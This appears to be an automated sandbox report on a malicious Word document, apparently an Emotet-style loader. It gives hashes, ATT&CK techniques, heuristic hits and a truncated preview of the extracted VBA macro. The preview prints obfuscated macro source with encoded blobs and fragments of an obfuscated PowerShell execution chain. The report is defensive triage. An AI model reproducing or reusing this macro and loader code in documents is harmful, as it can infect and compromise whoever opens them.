Office (OLE) malware analysis — malicious · 753fd58cbd15234f

MALICIOUS

Office (OLE)

147.5 KB Created: 2018-04-02 16:32:00 Authoring application: Microsoft Office Word First seen: 2018-04-12

MD5: 6d926d761c72f9994872e5959762748f SHA-1: 2eb1b8ab7c58298799833d68f8834ef298b6e98f SHA-256: 753fd58cbd15234fcfdfe9c8472866dbc41ddd0e7d5afc8e1b6bf31dab572ff2

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. Heuristics confirm the presence of VBA macros and a CreateObject call, commonly used for downloading and executing payloads. The ClamAV detection further supports its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	39171 bytes
SHA-256: `83f919252c64bd11252ae778de5b67d5484c0d3ef5761c50b04df85a6f5fd21d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 22 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FJOhqTzr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VPWWqdSY" Function MwDKPBjAza() On Error Resume Next iDwioc = kOznlU JospKw = 71175 wDWKr = 87263 + 59365 * mAopi + CDate(YkiWP + CDbl(59311)) * 14517 - 33579 ijSOCNVSDr = TiwmvK("fQA1ADQAYwBjADUANwBlAGYAMgAwADEAOAA5AGUANwBkADIAYgBmADEAZgA3ADAAMQA4AGUANQA2AGEAMgA5ADgAMQAzADQANwA0AGIAMwAyADkAYgBiADQAOAAxADAAZQBmADEANwA1ADMANQAzAGEANwAwADQAMQA0ADAAYgA3ADMAZgA0AGQANgA1ADcAOABiAXESw8L", 2, 195) jHYKPz = pPLMEs dloFz = 24163 wfrzQI = 14930 + 76691 * GOjXmD + CDate(iPPKK + CDbl(48964)) * 58100 - 42365 waXsw = VzfibL SibwN = 46389 Yjkzj = 48968 + 25320 * zcGzOW + CDate(SBfkV + CDbl(72496)) * 60924 - 75667 jvzDqzs = TiwmvK("zksDikAMAA0AGQANAA4ADMAOQAxADkAZgBlADQAYwBiADcAZQA5AGUAYgAwAGQAOQBlAGIANAAxAGIAOQA5AGMAMQBmADgANgA0ADcANAA1ADcASzX2", 6, 106) GLowlz = ErktP YIWclz = 5399 cwqILa = 37424 + 55222 * nswws + CDate(kOwAQ + CDbl(4055)) * 14492 - 57486 czqOW = zCmlk BMoibd = 25550 DNCuhB = 57376 + 28123 * XmWcdI + CDate(ozLlnH + CDbl(17849)) * 97348 - 87028 WoGQTwHCZwm = TiwmvK("LvGG -KEy 226,29,100,173,135,27,21,140,126,179,111,171,174,214,61,196,8,20,85,84,221,99,196Umf82", 4, 89) YiYBiL = JPOzwh jkQOz = 26816 YDMqd = 34849 + 53272 * wEDBp + CDate(vqjpbd + CDbl(35512)) * 27189 - 88532 qZYQW = JpqZk azAnc = 20948 wocbAm = 93481 + 4841 * sQTch + CDate(tYAiru + CDbl(486)) * 62058 - 71544 GmFBw = TiwmvK("oAwADgAZQBlADMAOABmAGEAYwA5ADkAMQBmAGYAZQA3ADIAMQAxADAAZAA4AGYAZgA3AGUAMAAwADAAZQBlADIAYQA0ADIAF7t7JlE", 2, 94) iaudN = ohsRM zXdaM = 98284 ZGHhqF = 53854 + 74673 * TEvIrG + CDate(LCZwn + CDbl(52251)) * 73322 - 69336 DMRaf = zNzZlr RvbUAO = 33507 EHbwzT = 92990 + 78489 * OCaNdL + CDate(VnWkKm + CDbl(39729)) * 17854 - 13491 RYJzmtFukH = TiwmvK("SNEAYwA4ADQHniKw", 3, 9) uzbHjk = WzFqd VDYJKj = 32508 okwzMr = 64205 + 52390 * mSpNZ + CDate(NhfRHq + CDbl(58347)) * 10916 - 78156 dXcCV = noMsrE laPoz = 66959 cVzMX = 84753 + 45335 * pEwkNa + CDate(DzzJRt + CDbl(72501)) * 68796 - 82591 qUCiD = TiwmvK("G & ( $PshoMe[21]+$PshoMe[30]+'X') (( [ruNtIme.INTERopSeRVICES.mARSHaL]::pTrTOStrInGBstR( [ruNTIme.InTERoPSErvIcES.mAr6kJDAHLz", 2, 117) wCPKqE = zXmHXP dUBzIv = 14213 oJWRqn = 33859 + 46886 * mIhbpH + CDate(zAEmqo + CDbl(39951)) * 61665 - 65224 KBYhLL = YUsNJH ZkINkP = 34844 IHROko = 74645 + 93457 * vYBpQb + CDate(hZbNwL + CDbl(78923)) * 89900 - 12272 ZERKBaoZ = TiwmvK("fczDQAYgAwAGUAZAA5ADYAZgA2ADUAOQBlAGYANgA1ADMANgAwADAANgA3AGMAMQA5ADkAYQBiADkANgBjADcAOAA3ADIAYgBhADkAMwBjAGEAOAA0ADgAMQA0ADQAMQBkADQAMABfDi", 4, 134) YEilaD = TsQPw zlYtSk = 11673 IIafLn = 8709 + 85014 * SXHIQi + CDate(NUVcW + CDbl(45219)) * 20398 - 35570 JRDfhm = PDXsJW JmhwiS = 8658 rVSlh = 42737 + 81114 * zCCPl + CDate(IuOsJ + CDbl(16344)) * 24854 - 29364 vwMzfUHm = TiwmvK("LiGImhaL]::sECuResTrIngTOBsTR( $('76492d1116743f0423413b16050a5345MgB8AGoAYwBwAEMAVgBuAFAAWAB5AGIANAB5ACsAeAA2AE4ARQBLAEMAYwBkAHcAPQA9AHwAMwA1ADYAOQBkADMANgAyADMAZAAzADAANQA5ADEANABkADAAMgA4ADAAOAA0AG4CE", 6, 195) lAPUKT = UlnIa MwFMZz = 50825 GGzAdm = 69866 + 80323 * wocoj + CDate(RBfmli + CDbl(32871)) * 55119 - 56843 KviTod = EfDAsJ TEKCYY = 41944 NMbzdS = 61109 + 99147 * YHPZnW + CDate(LIrwTh + CDbl(77276)) * 45888 - 80157 vuXqSpfCvD = TiwmvK("GcAADkAMgA1AGUAMgBmADAAMgzLj.", 5, 21) LWzZr = YXhRs AiZjac = 70823 GfhWrP = 64309 + 44654 * fYDJH + CDate(JADjC + CDbl(82092)) * 5454 - 11069 DVcfZ = CzwIC DODWOX = 57096 ioarzL = 44155 + 57866 * GXJjb + CDate(ibhfbN + CDbl(84739)) * 25755 - 97078 QhNiqmIjIuw = TiwmvK("zAzADUAZQBhADQANwBmAGEAMQBkADAAYQAyADMAMAA2ADMAMABlADAAMQBjAGIANQBlAGUAOQA1ADAANABmADYAOAAxADEANQBhADQAYwBiADQANAA4ADgANwBhADYAYQBhADQANQBjADcANQBhAGIAZQAxqfSuEiDU", 2, 154) XAdIkw = idYPvk OtYdpk = 85971 ccZuh = 85202 + 4960 * mabLaK + CDate(VjHvaG + CDbl(5197)) * 43104 - 66007 RzsiX = IYdnqN CDOpBw = 74844 tIHBjw = 5412 + 9 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.